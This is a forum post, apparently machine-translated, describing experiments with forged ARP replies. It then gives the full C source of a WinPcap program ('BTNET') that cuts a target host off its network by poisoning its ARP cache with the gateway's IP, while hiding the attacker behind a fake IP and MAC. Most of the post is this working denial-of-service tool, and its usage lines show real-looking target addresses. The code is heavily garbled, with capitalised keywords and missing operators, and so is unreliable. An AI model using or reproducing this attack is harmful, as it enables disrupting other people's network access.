Network attack program based on ARP spoof
I have recently been started to learn WinPCAP, I have read a lot of master-written ARP deceived captain tools, especially the "Talking to WinPCAP Drive Write ARP Multi-Function", which is called WinPCAP Drive ARP Multi-Function, especially the electronic capital of Too2y brothers. Here is some of the tests I change this idea to the ARP attack program (which can be disconnected by the target host. Master please, so as not to have a shroud.
The general ARP SPOOF is to send ARP Reply datagram to the deceived host, and the source IP address is set to the host address to be deceived, but the source MAC address is changed to its own MAC address. Suppose there is two machines A, B, send an ARP Reply Datased to A, where the source IP address is the address of B, the source MAC address is the MAC address of my machine (iProuter function opens ensures data forwarded), then A send When the Datagon of B is sent to my machine, the same way is the same for B, then the data between A <==> B will continue to forward my machine, until a normal ARP package Change the A, B ARP cache.
Then we change the source IP of the ARP datagram that sent to A, source MAC, what is the phenomenon? Here is my tests.
1. The source IP is changed to the gateway IP, the source Mac is changed to the MAC address that does not exist.
Almost does not affect the target host
2. The source IP is changed to the gateway IP. The source MAC is changed to any MAC address of any host in the intranet, but does not turn on the iprouter.
Barely affect
3. The source IP is changed to the gateway IP, and the source Mac is changed to the target host.
Target host immediately broken the network!
It can be seen that when the ARP REAL package that is constructed is given to the target host, the target host's ARP cache changes, the data package is encapsulated to the MAC layer, and the gateway is encapsulated together, and then sent to the gateway Data report has to send yourself, huh, huh.
As for the first case, the conjecture is probably because the MAC address does not exist, the target master will broadcast an ARP Request package and update your own ARP cache.
As for the second case, the host of the source MAC address returns an ARP Reply to the target host.
The level is limited, so just guess, please tell me, thank you.
Let's talk about it, the above test is only for the Windows system, and of course, it has also been tested for the successful Red Hat success.
Test program (BTNET.EXE) description:
USAGE: BTNET -H Attackip -o Gateip [-M SpoofedMac]
-m parameter is the source MAC address you want to modify.
In order to conceal the attacker, the program is re-installed into IP: 128.128.128.128, Mac: A5-A5-A5-A5-A5-A5, may not be able to get the MAC address of the target host, then get it MAC addresses, please use the third party tool.
#include "packet32.h"
#include "ntddndis.h"
#include
#include
#include
#include
#pragma comment (Lib, "WS2_32")
#pragma comment (Lib, "Packet")
#define eth_ip 0x0800
#define eth_arp 0x0806
#define arp_request 0x0001 // ARP request package
#define arp_reply 0x0002 // ARP answer package
#define arp_hardware 0x0001
#define max_num_adapter 10
#pragma Pack (Push, 1)
Typedef struct ethdr
{
Unsigned char eh_dst [6]; // Ethernet address unsigned char eh_src [6]; // Ethernet address
Unsigned short eh_type; //
} Ethdr, * pethdr;
Typedef struct arphdr // arm head
{
Unsigned short arp_hdr; // hardware type
UNSIGNED SHORT ARP_PRO; / / Protocol Type
Unsigned char arp_hln; / / hardware address length
Unsigned char arp_pln; // protocol address length
Unsigned short arp_opt; //
Unsigned char Arp_sha [6]; // Transmit Ethernet address
Unsigned long ARP_SPA; / / Send IP Address
Unsigned char Arp_tha [6]; // Receive Ethernet address
Unsigned long ARP_TPA; / / Receive end IP address
Arphdr, * PARPHDR;
Typedf struct ip_mac
{
u_long IP;
UNSIGNED Char Mac [6];
} Ip_mac, * pip_mac;
#pragma Pack (Push)
LPADAPTER LPADAPTER;
Char adapterlist [max_num_adapter] [1024];
IP_MAC TOIPANDMAC;
IP_MAC OipandMac, MyIpandMac;
BOOL param6 = false;
Char * Nomacstr;
Char Nomac [6] [3];
U_long mytoip, oip;
Bool sendtooip;
MSG msg;
Uint newtimer;
CHAR MYIP [20] = "128.128.128.128";
Bool toipandmac_flag = false, myipandmac_flag = false, OipandMac_Flag = false;
INT GetInt (Char C)
{
INT T = -1;
IF ((c <= '9') && (c> = '0')))
T = C-'0 ';
ELSE IF ((c> = 'a') && (c <= 'f'))
T = 10 c-'a ';
ELSE IF ((c> = 'a') && (c <= 'f'))
T = 10 c-'a ';
Return T;
}
Void start ()
{
Printf ("BTNET / / - AN ARP TOOL TEST The Windows Break The Internet / N");
Printf ("Written By Ruder, 10/2003 / N");
Printf ("Homepage:
http://xeyes.cdut.net/ruder/index.htm/;n ");
Printf ("e-mail: cocoruder@163.com/N");
Printf ("/ NUSAGE: BTNET -H Attackip -o Gateip [-M SpoofedMac] / N");
Printf ("eXample: / n");
Printf ("BTNET -H 202.115.138.12 -O 202.115.138.1/N");
Printf ("BTNET -H 202.115.138.12 -O 202.115.138.1 -M 00-50-Fc-6A - 6B - 7C / N"); Printf ("Warning: You Must Have Installed The WinPCAP_2.3 or WinPCAP_3. 0_alpha / n ");
Return;
}
DWORD WINAPI SNIFF (LPVOID)
{
LPPACKET LPPACKETS, LPPACKETR
Char recvbuf [1024 * 250];
Ulong UlbytesReceived, OFF;
Ethdr * eth;
Arphdr * ARP;
Char * buf, * pchar, * base;
Char sztemp [20];
Struct BPF_HDR * HDR;
IF ((LPPACKETS = packet ()) == false)
{
Printf ("PacketAllocatePacket Send Error:% D / N", getLastError ());
Return 0;
}
IF (PacketSethWFilter (LPADAPTER, NDIS_PACKET_TYPE_PMISCUOS) == false)
{
Printf ("Warning: Unable to set the adapter to promiscuous mode / n");
}
IF (PacketSetBuff (LPadapter, 500 * 1024) == false)
{
Printf ("PacketSetBuff Error:% D / N", getLastError ());
Return 0;
}
IF (PacketSetReadTimeout (LPADAPTER, 1) == false
{
Printf ("Warning: Unable to set the timeout / n");
}
IF ((LPPACKETR = packet ()) == false)
{
Printf ("PacketAllocatePacket Receive Error:% D / N", getLastError ());
Return 0;
}
PacketinitPacket (LPPACKETR, (CHAR *) Recvbuf, SizeOf (Recvbuf));
While (! kbhit ())
{
IF (PacketReceivePacket (LPADAPTER, LPPACKETR, TRUE) == FALSE
{
Return 0;
}
// GetData (LPPACKETR, OPTION);
UlbytesReceived = LPPACKETR-> ULBYTESRECEIVED;
BUF = (char *) LPPACKETR-> BUFFER;
OFF = 0;
While (off { IF (kbhit ()) { Return 0; } HDR = (Struct BPF_HDR *) (BUF OFF); OFF = HDR-> BH_HDRLEN PCHAR = (char *) (BUF OFF); Base = pchar; OFF = packet_wordalign (OFF HDR-> BH_CAPLEN); Eth = (pethdr) pchar; // ARP = (PARPHDR) (Pchar Sizeof (Ethdr)); // ARP header INT I; IF ((Eth-> EH_TYPE == HTONS (Eth_arp)) && (ARP-> ARP_OPT == Htons (ARP_REPLY))) { // if (arp-> arp_tpa == HTONL (NTOHL (INET_ADDR (MyIP)))))))))) { IF (OipandMac_Flag && myipandmac_flag && toipandmac_flag) Return 0; IF (((toipandMac.ip == HTONL (ARP-> ARP_SPA)) && (toipandMac_Flag == false)) || (((MyipandMac.ip == HTONL (ARP-> ARP_SPA)) && (MyIpandMac_Flag == False)) || (((OipandMac.ip == HTONL (ARP-> ARP_SPA)) && (OipandMac_Flag == False))))))) { MEMSET (SZTEMP, 0, SIZEOF (SZTEMP)); Memcpy (SzTemp, & Arp-> ARP_SPA, SIZEOF (ARP-> ARP_SPA); Printf ("[IP]:"); Printf ("% s", inet_ntoa (* (Struct in_addr *) sztemp))))); Printf ("[Mac]:"); For (i = 0; i <5; i ) { Printf ("%. 2x -", Eth-> EH_SRC [I]); } Printf ("%. 2X", Eth-> eh_src [5]); Printf ("/ n"); IF (toipandmac.ip == HTONL (ARP-> ARP_SPA)) { FOR (i = 0; i <6; i ) TOIPANDMAC.MAC [I] = Eth-> EH_SRC [I]; TOIPANDMAC_FLAG = TRUE; } IF (OipandMac.ip == HTONL (ARP-> ARP_SPA)) { FOR (i = 0; i <6; i ) OipandMac.mac [I] = Eth-> EH_SRC [i]; Oipandmac_flag = true; // Printf ("if you have get the mac addresses, press any key for staring! / N"); } IF (MyIpandMac.ip == HTONL (ARP-> ARP_SPA)) { FOR (i = 0; i <6; i ) Myipandmac.mac [i] = Eth-> eh_src [i]; Myipandmac_flag = true; } } } } CONTINUE; } } Return 0; } DWORD WINAPI Sendarppacket (LPVOID DWSENDTOIP) { LPPACKET LPPACKET; Ethdr eth; Arphdr arphdr; INT I; Char szpacketbuf [600]; u_long sendtoip = * (u_long *) dwsendtoip; // struct sockaddr_in sin; LPPACKET = packetallocatepacket (); IF (LPPACKET == NULL) { Printf ("/ NPACKETALLOCATEPACKET ERROR!"); Return 0; } Eth.e_type = HTONS (Eth_arp); FOR (i = 0; i <6; i ) { Eth.eH_DST [I] = 0xFF; Eth.eh_src [i] = 0xA5; Arphdr.arp_sha [i] = 0xA5; Arphdr.arp_tha [i] = 0xff; } Arphdr.arp_hdr = htons (arp_hardware); Arphdr.arp_pro = htons (eth_ip); Arphdr.arp_opt = HTONS (ARP_REQUEST); Arphdr.arp_hln = 6; Arphdr.arp_pln = 4; Arphdr.arp_tpa = HTONL (SendToIP); Arphdr.arp_spa = HTONL (NTOHL (INET_ADDR (MYIP)); IF (sendtooip) { IF (MyIpandMac_Flag) { FOR (i = 0; i <6; i ) { Eth.eh_src [i] = myipandmac.mac [i]; Arphdr.arp_sha [i] = myipandmac.mac [i]; Arphdr.arp_spa = HTONL (MyIpandMac.ip); // Memset (MyIP, 0, SIZEOF (MyIP)); } } Else { Printf ("My Mac Address CAN't Find! / N"); Return 0; } } MEMSET (SzpacketBuf, 0, Sizeof (SzpacketBUF); Memcpy (SzpacketBuf, ð, SIZEOF (Ethdr)); Memcpy (SzpacketBuf SizeOf (Ethdr), & Arphdr, SizeOf (arphdr)); PacketinitPacket (LPPACKET, SZPACKETBUF, 60); IF (PacketSetNumWrites (LPADAPTER, 1) == false) { Printf ("Warning: Unable to send more than one packet in a single write! / n"); } IF (PacketSendPacket (LPADAPTER, LPPACKET, TRUE) == FALSE) { Printf ("Error Sending The Packets! / N"); PacketFreePacket; Return 0; } PacketFreePacket; Return 0; } DWORD WINAPI Sendsr () { Ethdr eth; Arphdr arphdr; INT I; Char szpacketbuf [600]; LPPACKET LPPACKET; UNSIGNED Char Tomac [6]; Struct SockAddr_in sin; u_long toip = mytoip; // if ((MyIpandMac_flag == false) || (OipandMac_Flag == false) || (ToipandMac_Flag == FALSE)) // { // Printf ("can't get all mac address! / N"); // Return 0; //} LPPACKET = packetallocatepacket (); IF (LPPACKET == NULL) { Printf ("/ Nerror: failed to allocate the lppacket structure./N"); Return 0; } IF (toipandmac_flag == false) { Printf ("can't get tomac address! / n"); Return 0; } MEMSET (Tomac, 0, Sizeof (Tomac)); Memcpy (Tomac, & Toipandmac.mac, Sizeof (ToipandMac.mac); IF (param6) { FOR (i = 0; i <6; i ) { INT T1, T2; CHAR C1, C2; C1 = Nomac [I] [0]; C2 = Nomac [i] [1]; T1 = GetInt (C1); T2 = GetInt (C2); IF ((t1 == - 1) || (T2 == - 1))) { Printf ("- M Parameter Error! / N"); Return 0; } Eth.eh_src [i] = t1 * 16 t2; Eth.eh_dst [i] = tomac [i]; Arphdr.arp_sha [i] = t1 * 16 t2; Arphdr.arp_tha [i] = tomac [i]; } } Else { FOR (i = 0; i <6; i ) { Eth.eh_src [i] = tomac [i]; Eth.eh_dst [i] = tomac [i]; Arphdr.arp_sha [i] = tomac [i]; Arphdr.arp_tha [i] = tomac [i]; } } Eth.e_type = HTONS (Eth_arp); Arphdr.arp_spa = HTONL (OIP); Arphdr.arp_tpa = htonl (toip); Arphdr.arp_hdr = htons (arp_hardware); Arphdr.arp_pro = htons (eth_ip); Arphdr.arp_opt = htons (arp_reply); Arphdr.arp_hln = 6; Arphdr.arp_pln = 4; MEMSET (SzpacketBuf, 0, Sizeof (SzpacketBUF); Memcpy (SzpacketBuf, ð, SIZEOF (Ethdr)); Memcpy (SzpacketBuf SizeOf (Ethdr), & Arphdr, SizeOf (arphdr)); PacketinitPacket (LPPACKET, SZPACKETBUF, 60); IF (PacketSetNumWrites (LPADAPTER, 1) == false) { Printf ("Warning: Unable to send more than one packet in a single write! / n"); } IF (PacketSendPacket (LPADAPTER, LPPACKET, TRUE) == FALSE) { Printf ("Error Sending The Packets! / N"); PacketFreePacket; Return 0; } PacketFreePacket; Sin.sin_addr.s_addr = arphdr.arp_tpa; printf ("SPOOF% S:", INET_NTOA (SIN.SIN_ADDR)); Sin.sin_addr.s_addr = arphdr.arp_spa; Printf ("% s ->", inet_ntoa (sin.sin_addr); For (i = 0; i <5; i ) Printf ("%. 2X -", arphdr.arp_sha [i]); Printf ("% x", arphdr.arp_sha [5]); Printf ("/ n"); Return 0; } DWORD WINAPI Sendsrtimer (LPVOID DWTOIP) { Printf ("Waiting Spoof Start / N); MyToip = * (u_long *) DWTOIP; NEWTIMER = SETTIMER (NULL, NULL, 5 * 1000, TimerProc (senendsr)); While (GetMessage (& MSG, 0,0,0)) { TranslateMessage (& MSG); DispatchMessage (& MSG); } Return 0; } Int main (int Argc, char * argv []) { Handle Thread1, Thread2, Thread3; Wchar adaptername [8192]; Wchar * name1, * name2; Ulong adapterLength; DWORD Threadid1, Threadid2, ThreadID3; U_long toip, myip; Struct Nettype NTYPE; Struct SockAddr_in sin; Struct NPF_IF_ADDR IPBUFF; Int adapternum = 0, OPTI = 0, Open, I, J Long npflen; IF ((argc! = 5) && (argc! = 7)) { START (); Return 0; } ELSE IF ((Strcmp (Argv [1], "- H")! = 0) || (Strcmp (Argv [3], "- O")! = 0)) { START (); Return 0; } Toip = NTOHL (INET_ADDR (Argv [2])); OIP = NTOHL (INET_ADDR (Argv [4])); IF (Argv [5]! = null) { IF (strcmp (Argv [5], "- M") == 0) { Nomacstr = argv [6]; J = 0; FOR (i = 0; i <6; i ) { MEMSET (Nomac [I], 0, SIZEOF (Nomac [i])); Memcpy (Nomac [I], NomacStr, 2); Nomacstr = NomacStr 3; } PARAM6 = TRUE; } } Printf ("/ NLIBARARY VERSION:% S", packetgetversion ()); AdapterLength = SizeOf (Adaptername); IF (PacketGetAdapternames ((char *) adaptername, & adapterLength) == false) // Get a list of network cards { Printf ("PacketGetAdapternames Error:% D / N", getLastError ()); Return -1; } Name1 = adaptername; Name2 = adaptername; i = 0; While (* Name1! = '/ 0') || (* (Name1-1)! = '/ 0')) { IF (* Name1 == '/ 0') { Memcpy (AdapterList [i], Name2, 2 * (Name1-Name2)); Name2 = Name1 1; i ; } Name1 ; } Adapternum = i; Printf ("/ NADADAPTERS Installed: / N"); For (i = 0; i WPRINTF (L "% D-% S / N", i 1, AdapterList [i]); DO { Printf ("/ NSELECT The NUMBER of the Adapter to Open:"); Scanf ("% D", & open); IF (open> = 1 && open <= adapternum) Break; } While (Open <1 || open> adapternum); LPADAPTER = PacketopenAdapter (AdapterList [Open-1]); IF (! lpadapter || (lpadapter-> hfile == invalid_handle_value))) { Printf ("Packetopenadapter Error:% D / N", getLastError ()); Return -1; } IF (PacketGetType (LPADAPTER, & NTYPE)) { Printf ("/ n / t / t *** host information *** / n"); Printf ("[linktpye:] / T% D / T / T", NTYPE.LINKTYPE; Printf ("[LinkSpeed:] / T% D B / S / N", NTYPE.LINKSPEED; } NPFLEN = SizeOf (IPBUF); IF (PacketGetNetinfoEx (AdapterList [Open-1], & IPBuff, & npflen) { SIN = * (Struct SockAddr_IN *) & (ipbuff.broadcast); Printf ("[Broadcast:] / T% .16S / T", INET_NTOA (SIN.SIN_ADDR); SIN = * (struct socmeddr_in *) & (ipbuff.subnetmask); Printf ("[SubnetMask:] / T% .16S / N", INET_NTOA (SIN.SIN_ADDR)); SIN = * (Struct SockAddr_in *) & (ipbuff.ipaddress); Printf ("[ipaddress:] / t% .16s / t", inet_ntoa (sin.sin_addr); Myip = ntohl (sin.sin_addr.s_addr); Printf ("[MacAddress:]"); } Else { Printf ("/ NNOT Get Enough Data / N); // packetfreepacket (lppcktr); PacketCloseadapter (LPADAPTER); Return -1; Printf ("/ n"); Oipandmac.ip = OIP; TOIPANDMAC.IP = TOIP; Myipandmac.ip = myip; Sendtooip = false; Thread1 = CreateThread (NULL, 0, SNIFF, NULL, 0, & ThreadID1); SLEEP (300); Thread2 = CreateThread (Null, 0, Sendarppacket, (LPVOID) & myip, 0, & threadid2); Sleep (100); CloseHandle (thread2); Thread2 = CreateThread (Null, 0, SendarppAcket, (LPVOID) & toip, 0, & ThreadID2); Sleep (10); CloseHandle (thread2); Sendtooip = True; Sleep (200); Thread2 = CreateThread (Null, 0, Sendarppacket, (LPVOID) & OIP, 0, & ThreadID2); Sleep (10); CloseHandle (thread2); // WaitForsingleObject (thread1, infinite); Thread3 = CreateThread (Null, 0, Sendsrtimer, (LPVOID) & toip, 0, & ThreadID3); WaitforsingleObject (Thread3, Infinite); PacketCloseadapter (LPADAPTER); Return 0; }
